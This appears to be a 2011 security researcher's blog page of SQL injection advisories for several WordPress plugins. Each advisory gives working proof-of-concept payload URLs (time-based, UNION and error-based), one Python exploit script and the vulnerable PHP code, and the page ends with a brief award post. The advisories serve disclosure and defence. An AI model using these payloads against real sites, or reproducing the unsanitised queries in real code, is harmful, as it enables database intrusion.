# Version: 0.64 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/wp-symposium/uploadify/get_profile_avat
ar.php?uid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),
0)

---------------
Vulnerable code
---------------
$uid = $_REQUEST['uid'];
$sql = "SELECT profile_avatar FROM ".$wpdb->base_prefix."symposium_usermeta WHER
E uid = ".$uid;

p.s. author has been contacted (fixed)

WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability

# Exploit Title: WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerabili
ty
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip
# Version: 1.1.2 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=
IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
$fgid = $_GET['fgid'];

...

$file_list = $wpdb->get_col("select guid from wp_posts where post_parent = $fgid
");

p.s. author has been contacted (will fix it)

WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability

# Exploit Title: WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vuln
erability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/contus-hd-flv-player.1.3.
zip
# Version: 1.3 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/contus-hd-flv-player/process-sortable.php
?playid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&
listItem[]=1

---------------
Vulnerable code
---------------
$pid1 = $_GET['playid'];

foreach ($_GET['listItem'] as $position => $item) :
    mysql_query("UPDATE $wpdb->prefix" . "hdflv_med2play SET `sorder` =
     $position WHERE `media_id` = $item and playlist_id=$pid1 ");
endforeach;

p.s. author has been contacted (no reply yet)

Tuesday, August 16, 2011

WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability

# Exploit Title: WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability
# Date: 2011-08-16
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip
# Version: 3.0 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/ip-logger/map-details.php?lat=-1 UNION
ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=0&blocked=0

---------------
Vulnerable code
---------------
$sql = sprintf("select stamp,ip_v4,url,user_agent,Provider,Code3,Country,
 Blocked,Ignored from $table_name 
  where Latitude=%s and Longitude=%s and Blocked = '%s'
  order by stamp asc limit 50",
  $_REQUEST["lat"],
  $_REQUEST["lon"],
  $_REQUEST["blocked"]);

$res = mysql_query($sql);

p.s. author has been contacted (no reply yet)

Saturday, August 6, 2011

WordPress Media Library Categories plugin <= 1.0.6 SQL Injection Vulnerability

# Exploit Title: Media Library Categories <= 1.0.6 SQL Injection Vulnerability
# Date: 2011-08-06
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/media-library-categories.
1.0.6.zip
# Version: 1.0.6 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/media-library-categories/sort.php?termid=
-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20

http://www.site.com/wp-content/plugins/media-library-categories/sort.php?termid=
1 AND EXTRACTVALUE(1,CONCAT(CHAR(92),@@version))

---------------
Vulnerable code
---------------
$termid=$_GET['termid'];

...

$where = '';
if($termid)
{
    $where .= " && tt.term_id=".$termid;
} 

...

$query = "SELECT p.*, a.term_order FROM " . $table_prefix . "posts p inner join
" . $table_prefix . "term_relationships a on a.object_id = p.ID inner join " . 
$table_prefix . "term_taxonomy ttt on ttt.term_taxonomy_id = a.term_taxonomy_id
inner join " . $table_prefix . "terms tt on ttt.term_id = tt.term_id where 
ttt.taxonomy='media_category' $where order by a.term_order asc;";

$results = mysql_query($query);

p.s. author has been contacted (fixed)

WordPress UPM Polls plugin <= 1.0.3 SQL Injection Vulnerability

# Exploit Title: UPM Polls <= 1.0.3 SQL Injection Vulnerability
# Date: 2011-08-06
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/upm-polls.1.0.3.zip
# Version: 1.0.3 (tested)

---
PoC
---
#!/bin/python

import re
import urllib2
import urlparse

url = "http://www.site.com/wp-content/plugins/upm-polls/includes/poll_logs.php?
qid=-1 UNION ALL SELECT NULL,CONCAT(CHAR(96),@@version,CHAR(96)),NULL,NULL,NULL,
NULL-- ".replace(" ", "%20")
req = urllib2.Request(url=url, headers={"Referer": url})
content = urllib2.urlopen(req).read()
match = re.search(r"`(.+)`", content)

print match.group(1) if match else "None"

---------------
Vulnerable code
---------------
$ref = parse_url( $_SERVER['HTTP_REFERER'] );
if( $_SERVER["HTTP_HOST"] != $ref['host'] ){
 exit('UPM Error:128');
}

...

$QID = $_GET['qid'];
$POLL = $wpdb->get_row("SELECT * FROM `".$wpdb->prefix."pppm_polls` WHERE `id` =
$QID", ARRAY_A);

p.s. author has been contacted (fixed)

Friday, August 5, 2011

WordPress Social Slider plugin <= 5.6.5 SQL Injection Vulnerability

# Exploit Title: Social Slider <= 5.6.5 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/social-slider-2.zip
# Version: 5.6.5 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/social-slider-2/ajax.php
 action=ZapiszPozycje&rA[]=1 AND SLEEP(5)

---------------
Vulnerable code
---------------
$SocialSliderArray = $_POST['rA'];

if (mysql_real_escape_string($_POST['action']) == "ZapiszPozycje")
    {
    $lC = 1;
    foreach ($SocialSliderArray as $recordIDValue)
        {
        $query = "UPDATE ".$table_prefix."socialslider SET lp = ".$lC." WHERE id
= ".$recordIDValue;
        mysql_query($query);
        $lC = $lC + 1;    
        }
    }

p.s. author has been contacted (fixed)

WordPress ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability

# Exploit Title: ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/proplayer.4.7.7.zip
# Version: 4.7.7 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/proplayer/playlist-controller.php?pp_play
list_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20

---------------
Vulnerable code
---------------
function getPlaylist($id = '') {
 $query = mysql_query("SELECT * FROM ".$this->tablePrefix."proplayer_playlist
WHERE (POST_ID='$id')");
 $playlistRow = mysql_fetch_row($query);
 
 return $this->withBackwardCompatibility($playlistRow[2]);
}

...

if (!empty($_GET["pp_playlist_id"])) {
 header("Content-type: application/xml");
 $xml = $playlistController->getPlaylist($_GET["pp_playlist_id"]);

p.s. author has been contacted (no reply yet)

Monday, August 1, 2011

ModSecurity Level II award

I've just got (via FedEx) winners T-shirt from @ModSecurity for successful passing of Level II challenge as one half of "Sqlmap Developers" team :)